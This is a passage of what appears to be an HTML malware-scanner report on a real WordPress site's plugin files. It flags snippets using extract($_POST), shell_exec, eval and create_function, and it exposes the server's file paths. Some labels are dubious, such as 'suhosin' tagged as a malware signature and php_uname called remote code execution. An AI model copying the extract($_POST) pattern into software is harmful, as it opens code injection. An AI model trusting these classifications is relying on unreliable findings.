</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_140").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-content/plugins/wp-all-import/actions/wp_ajax_import_failed.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 799.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:16</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_141" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit extract_global <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 12</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">extract</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_141").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-content/plugins/wp-all-import/controllers/controller/admin.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 7.84 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:16</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_142" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function create_function <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `create_function`</p><p><i>[<a href="https://www.php.net/create_function" target="_blank" class="text-primary">https://www.php.net/create_function</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">'$str'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'return&nbsp;"http://"&nbsp;==&nbsp;$str&nbsp;||&nbsp;"ftp://"&nbsp;==&nbsp;$str&nbsp;?&nbsp;""&nbsp;:&nbsp;$str;'</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">input</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">addFilter</span><span style="color: #007700">(</span><span style="color: #0000BB">$filter</span><span style="color: #007700">);&nbsp;}&nbsp;global&nbsp;</span><span style="color: #0000BB">$wp_styles</span><span style="color: #007700">;&nbsp;if&nbsp;(&nbsp;!&nbsp;</span><span style="color: #0000BB">is_a</span><span style="color: #007700">(</span><span style="color: #0000BB">$wp_styles</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'WP_Styles'</span><span style="color: #007700">))&nbsp;</span><span style="color: #0000BB">$wp_styles&nbsp;</span><span style="color: #007700">=&nbsp;new&nbsp;</span><span style="color: #0000BB">WP_Styles</span><span style="color: #007700">();&nbsp;</span><span style="color: #0000BB">wp_enqueue_style</span><span style="color: #007700">(</span><span style="color: #DD0000">'jquery-ui'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">WP_ALL_IMPORT_ROOT_URL&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'/static/js/jquery/css/redmond/jquery-ui.css'</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">wp_enqueue_style</span><span style="color: #007700">(</span><span style="color: #DD0000">'jquery-tipsy'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">WP_ALL_IMPORT_ROOT_URL&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'/static/js/jquery/css/smoothness/jquery.tipsy.css'</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">wp_enqueue_style</span><span style="color: #007700">(</span><span style="color: #DD0000">'pmxi-admin-style'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">WP_ALL_IMPORT_ROOT_URL&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'/static/css/a...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_142").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-content/plugins/duplicator/views/tools/diagnostics/inc.settings.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 8.61 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_143" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 157</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_143").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-content/plugins/duplicator/installer/dup-installer/ctrls/ctrl.s1.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 19.32 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_144" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$command</span><span style="color: #007700">);&nbsp;if&nbsp;(</span><span style="color: #0000BB">$stderr&nbsp;</span><span style="color: #007700">!=&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$zip_err_msg&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">ERR_SHELLEXEC_ZIPOPEN</span><span style="color: #007700">.</span><span style="color: #DD0000">":&nbsp;</span><span style="color: #0000BB">$stderr</span><span style="color: #DD0000">"</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$zip_err_msg&nbsp;</span><span style="color: #007700">.=&nbsp;</span><span style="color: #DD0000">"&lt;br/&gt;&lt;br/&gt;&lt;b&gt;To&nbsp;resolve&nbsp;error&nbsp;see&nbsp;&lt;a&nbsp;href='https://snapcreek.com/duplicator/docs/faqs-tech/#faq-installer-130-q'&nbsp;target='_blank'&gt;https://snapcreek.com/duplicator/docs/faqs-tech/#faq-installer-130-q&lt;/a&gt;&lt;/b&gt;"</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">DUPX_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">error</span><span style="color: #007700">(</span><span style="color: #0000BB">$zip_err_msg</span><span style="color: #007700">);&nbsp;}&nbsp;</span><span style="color: #0000BB">DUPX_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">info</span><span style="color: #007700">(</span><span style="color: #DD0000">"&lt;&lt;&lt;&nbsp;Shell-Exec&nbsp;Unzip&nbsp;Complete."</span><span style="color: #007700">);&nbsp;break;&nbsp;case&nbsp;</span><span style="color: #DD0000">'ziparchive'</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">DUPX_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">info</span><span style="color: #007700">(</span><span style="color: #DD0000">"\n\nSTART&nbsp;ZIP&nbsp;FILE&nbsp;EXTRACTION&nbsp;STANDARD&nbsp;&gt;&gt;&gt;&nbsp;"</span><span style="color: #007700">);&nbsp;if&nbsp;(!class...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 99</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">SUHOSIN</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_144").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-content/plugins/duplicator/installer/dup-installer/views/view.s1.base.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 59.74 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:16</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_145" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 285</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Suhosin</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 286</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_145").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-content/plugins/duplicator/installer/dup-installer/assets/inc.libs.js.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 527.37 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_146" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #DD0000">'('</span><span style="color: #007700">+</span><span style="color: #0000BB">text</span><span style="color: #007700">+</span><span style="color: #DD0000">')'</span><span style="color: #007700">);return&nbsp;</span><span style="color: #0000BB">typeof&nbsp;filter</span><span style="color: #007700">===</span><span style="color: #DD0000">'function'</span><span style="color: #007700">?</span><span style="color: #0000BB">walk</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">,</span><span style="color: #0000BB">j</span><span style="color: #007700">):</span><span style="color: #0000BB">j</span><span style="color: #007700">;}<br />throw&nbsp;new&nbsp;</span><span style="color: #0000BB">SyntaxError</span><span style="color: #007700">(</span><span style="color: #DD0000">'parseJSON'</span><span style="color: #007700">);}};}();}<br />&lt;/</span><span style="color: #0000BB">script</span><span style="color: #007700">&gt;<br /><br />&lt;</span><span style="color: #0000BB">script</span><span style="color: #007700">&gt;<br /></span><span style="color: #FF8000">/**<br />&nbsp;*&nbsp;password_strength_plugin.js<br />&nbsp;*&nbsp;Copyright&nbsp;(c)&nbsp;20010&nbsp;myPocket&nbsp;technologies&nbsp;(www.mypocket-technologies.com)<br />&nbsp;*&nbsp;@author&nbsp;Darren&nbsp;Mason&nbsp;(djmason9@gmail.com)<br />&nbsp;*&nbsp;@date&nbsp;3/13/2009<br />&nbsp;*&nbsp;@projectDescription&nbsp;Password&nbsp;Strength&nbsp;Meter&nbsp;is&nbsp;a&nbsp;jQuery&nbsp;plug-in&nbsp;provide&nbsp;you&nbsp;smart&nbsp;algorithm&nbsp;to&nbsp;detect&nbsp;a&nbsp;password&nbsp;strength.&nbsp;<br />&nbsp;*&nbsp;Based&nbsp;on&nbsp;Firas&nbsp;Kassem&nbsp;orginal&nbsp;plugin&nbsp;-&nbsp;phiras.wordpress.com/20...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">exec</span><span style="color: #007700">(</span><span style="color: #0000BB">a</span><span style="color: #007700">)))if(</span><span style="color: #0000BB">j</span><span style="color: #007700">=</span><span style="color: #0000BB">f</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">]){if(</span><span style="color: #0000BB">9</span><span style="color: #007700">===</span><span style="color: #0000BB">k</span><span style="color: #007700">){if(</span><span style="color: #0000BB">h</span><span style="color: #007700">=</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #0000BB">j</span><span style="color: #007700">),!</span><span style="color: #0000BB">h</span><span style="color: #007700">||!</span><span style="color: #0000BB">h</span><span style="color: #007700">.</span><span style="color: #0000BB">parentNode</span><span style="color: #007700">)return&nbsp;</span><span style="color: #0000BB">d</span><span style="color: #007700">;if(</span><span style="color: #0000BB">h</span><span style="color: #007700">.</span><span style="color: #0000BB">id</span><span style="color: #007700">===</span><span style="color: #0000BB">j</span><span style="color: #007700">)return&nbsp;</span><span style="color: #0000BB">d</span><span style="color: #007700">.</span><span style="color: #0000BB">push</span><span style="color: #007700">(</span><span style="color: #0000BB">h</span><span style="color: #007700">),</span><span style="color: #0000BB">d</span><span style="color: #007700">}else&nbsp;if(</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">ownerDocument</span><span style="color: #007700">&amp;&amp;(</span><span style="color: #0000BB">h</span><span style="color: #007700">=</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">ownerDocument</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #0000BB">j</span><span style="color: #007700">))&amp;&amp;</span><span style="color: #0000BB">t</span><span style="color: #007700">(</span><span style="color: #0000BB">b</span><span style="color: #007700">,</span><span style="color: #0000BB">h</span><span style="color: #007700">)&amp;&amp;</span><span style="color: #0000BB">h</span><span style="color: #007700">.</span><span style="color: #0000BB">id</span><span style="color: #007700">===</span><span style="color: #0000BB">j</span><span style="color: #007700">)return&nbsp;</span><span style="color: #0000BB">d</span><span style="color: #007700">.</span><span style="color: #0000BB">push</span><span style="color: #007700">(</span><span style="color: #0000BB">h</span><span style="color: #007700">),</span><span style="color: #0000BB">d</span><span style="color: #007700">}else{if(</span><span style="color: #0000BB">f</span><span style="color: #007700">[</span><span style="color: #0000BB">2</span><span style="color: #007700">])return&nbsp;</span><span style="color: #0000BB">H</span><span style="color: #007700">.</span><span style="color: #0000BB">apply</span><span style="color: #007700">(</span><span style="color: #0000BB">d</span><span style="color: #007700">,</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementsByTagName</span><span style="color: #007700">(</span><span style="color: #0000BB">a</span><span style="color: #007700">)),</span><span style="color: #0000BB">d</span><span style="color: #007700">;if((</span><span style="color: #0000BB">j</span><span style="color: #007700">=</span><span style="color: #0000BB">f</span><span style="color: #007700">[</span><span style="color: #0000BB">3</span><span style="color: #007700">])&amp;&amp;</span><span style="color: #0000BB">c</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementsByClassName</span><span style="color: #007700">)return&nbsp;</span><span style="color: #0000BB">H</span><span style="color: #007700">.</span><span style="color: #0000BB">apply</span><span style="color: #007700">(</span><span style="color: #0000BB">d</span><span style="color: #007700">,</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementsByClassName</span><span style="color: #007700">(</span><span style="color: #0000BB">j</span><span style="color: #007700">)),</span><span style="color: #0000BB">d</span><span style="color: #007700">}if(</span><span style="color: #0000BB">c</span><span style="color: #007700">.</span><span style="color: #0000BB">qsa</span><span style="color: #007700">&amp;&amp;(!</span><span style="color: #0000BB">q</span><span style="color: #007700">||!</span><span style="color: #0000BB">q</span><span style="color: #007700">.</span><span style="color: #0000BB">test</span><span style="color: #007700">(</span><span style="color: #0000BB">a</span><span style="color: #007700">))){if(</span><span style="color: #0000BB">s</span><span style="color: #007700">=</span><span style="color: #0000BB">r</span><span style="color: #007700">=</span><span style="color: #0000BB">u</span><span style="color: #007700">,</span><span style="color: #0000BB">w</span><span style="color: #007700">=</span><span style="color: #0000BB">b</span><span style="color: #007700">,</span><span style="color: #0000BB">x</span><span style="color: #007700">=</span><span style="color: #0000BB">1</span><span style="color: #007700">!==</span><span style="color: #0000BB">k</span><span style="color: #007700">&amp;&amp;</span><span style="color: #0000BB">a</span><span style="color: #007700">,</span><span style="color: #0000BB">1</span><span style="color: #007700">===</span><span style="color: #0000BB">k</span><span style="color: #007700">&amp;&amp;</span><span style="color: #DD0000">"object"</span><span style="color: #007700">!==</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">nodeName</span><span style="color: #007700">.</span><span style="color: #0000BB">toLowerCase</span><span style="color: #007700">()){</span><span style="color: #0000BB">o</span><span style="color: #007700">=</span><span style="color: #0000BB">g</span><span style="color: #007700">(</span><span style="color: #0000BB">a</span><span style="color: #007700">),(</span><span style="color: #0000BB">r</span><span style="color: #007700">=</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">"id"</span><span style="color: #007700">))?</span><span style="color: #0000BB">s</span><span style="color: #007700">=</span><span style="color: #0000BB">r</span><span style="color: #007700">.</span><span style="color: #0000BB">replace</span><span style="color: #007700">(</span><span style="color: #0000BB">bb</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">a</span><span style="color: #007700">,</span><span style="color: #0000BB">b</span><span style="color: #007700">,</span><span style="color: #0000BB">c</span><span style="color: #007700">,</span><span style="color: #0000BB">d</span><span style="color: #007700">,</span><span style="color: #0000BB">e</span><span style="color: #007700">,</span><span style="color: #0000BB">f</span><span style="color: #007700">,</span><span style="color: #0000BB">g</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_146").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-content/plugins/duplicator/installer/dup-installer/classes/class.server.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.32 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_147" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #DD0000">'echo&nbsp;duplicator'</span><span style="color: #007700">))&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;return&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">;&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">get_unzip_filepath</span><span style="color: #007700">()&nbsp;{&nbsp;</span><span style="color: #0000BB">$filepath&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">null</span><span style="color: #007700">;&nbsp;if&nbsp;(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">is_shell_exec_available</span><span style="color: #007700">())&nbsp;{&nbsp;if&nbsp;(</span><span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #DD0000">'hash&nbsp;unzip&nbsp;2&gt;&amp;1'</span><span style="color: #007700">)&nbsp;==&nbsp;</span><span style="color: #0000BB">NULL</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$filepath&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">'unzip'</span><span style="color: #007700">;&nbsp;}&nbsp;else&nbsp;{&nbsp;</span><span style="color: #0000BB">$possible_paths&nbsp;</span><span style="color: #007700">=&nbsp;array(</span><span style="color: #DD0000">'/usr/bin/unzip'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'/opt/local/bin/unzip'</span><span style="color: #007700">);&nbsp;foreach&nbsp;(</span><span style="color: #0000BB">$possible_paths&nbsp;</span><span style="color: #007700">as&nbsp;</span><span style="color: #0000BB">$path</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(</span><span style="color: #0000BB">file_exists</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">$filepath&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$path</span><span style="color: #007700">;&nbsp;break;&nbsp;}&nbsp;}&nbsp;}&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">$filepath</span><span style="color: #007700">;&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">isWordPress</span><span style="color: #007700">()&nbsp;{&nbsp;</span><span style="color: #0000BB">$search_list&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">explode</span><span style="color: #007700">(</span><span style="color: #DD0000">','</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">$wpCo</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 74</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_147").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-content/plugins/duplicator/installer/dup-installer/classes/Crypt/Base.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 98.92 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_148" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit php_uname <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2631</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">(</span><span style="color: #DD0000">'m'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Function create_function <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `create_function`</p><p><i>[<a href="https://www.php.net/create_function" target="_blank" class="text-primary">https://www.php.net/create_function</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">'$_action,&nbsp;&amp;$self,&nbsp;$_text'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$init_crypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'if&nbsp;($_action&nbsp;==&nbsp;"encrypt")&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$encrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}&nbsp;else&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$decrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}'</span><span style="color: #007700">);&nbsp;}&nbsp;function&nbsp;&amp;</span><span style="color: #0000BB">_getLambdaFunctions</span><span style="color: #007700">()&nbsp;{&nbsp;static&nbsp;</span><span style="color: #0000BB">$functions&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;return&nbsp;</span><span style="color: #0000BB">$functions</span><span style="color: #007700">;&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">_hashInlineCryptFunction</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(!</span><span style="color: #0000BB">defined</span><span style="color: #007700">(</span><span style="color: #DD0000">'CRYPT_BASE_WHIRLPOOL_AVAILABLE'</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">define</span><span style="color: #007700">(</span><span style="color: #DD0000">'CRYPT_BASE_WHIRLPOOL_AVAILABLE'</span><span style="color: #007700">,&nbsp;(bool)(</span><span style="color: #0000BB">extension_loaded</span><span style="color: #007700">(</span><span style="color: #DD0000">'hash'</span><span style="color: #007700">)&nbsp;&amp;&amp;&nbsp;</span><span style="color: #0000BB">in_array</span><span style="color: #007700">(</span><span style="color: #DD0000">'whirlpool'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">hash_algos</span><span style="color: #007700">())));&nbsp;}&nbsp;</span><span style="color: #0000BB">$result&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$hash&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">;&nbsp;switch&nbsp;(</span><span style="color: #0000BB">true</span><span style="color: #007700">)&nbsp;{&nbsp;case&nbsp;</span><span style="color: #0000BB">CRYPT_BASE_WHIRL</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
